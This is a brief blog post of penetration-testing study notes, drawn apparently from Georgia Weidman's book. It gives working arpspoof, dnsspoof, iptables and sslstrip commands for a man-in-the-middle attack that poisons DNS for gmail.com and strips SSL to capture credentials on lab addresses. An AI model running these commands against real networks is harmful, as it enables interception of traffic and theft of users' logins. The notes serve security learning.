Capturing Traffic

Source: Georgia Weidman on “Advanced Penetration Test”

(1) ARP Spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.20.11 192.168.20.10
arpspoof -i eth0 -t 192.168.20.10 192.168.20.11

(2) Domain Name Service (DNS)
DNS Cache Poisoning
hosts.txt: 192.168.20.9 http://www.gmail.com
*Restart arpspoofing between gateway and target
dnsspoof -i eth0 -f hosts.txt

(3) Secure Socket Layer (SSL)
Crypto between browser and webserver
Can’t see credentials in plaintext

SSL Man in the Middle
SSL Stripping
iptables -t nat -A PREROUTING -p tcp — destination-port 80 -j REDIRECT –to-port 8080
Spoof the default gateway with Arpspoof
sslstrip -l 8080

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

%d bloggers like this:

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

Share this:

Like this:

Related

Leave a Reply Cancel reply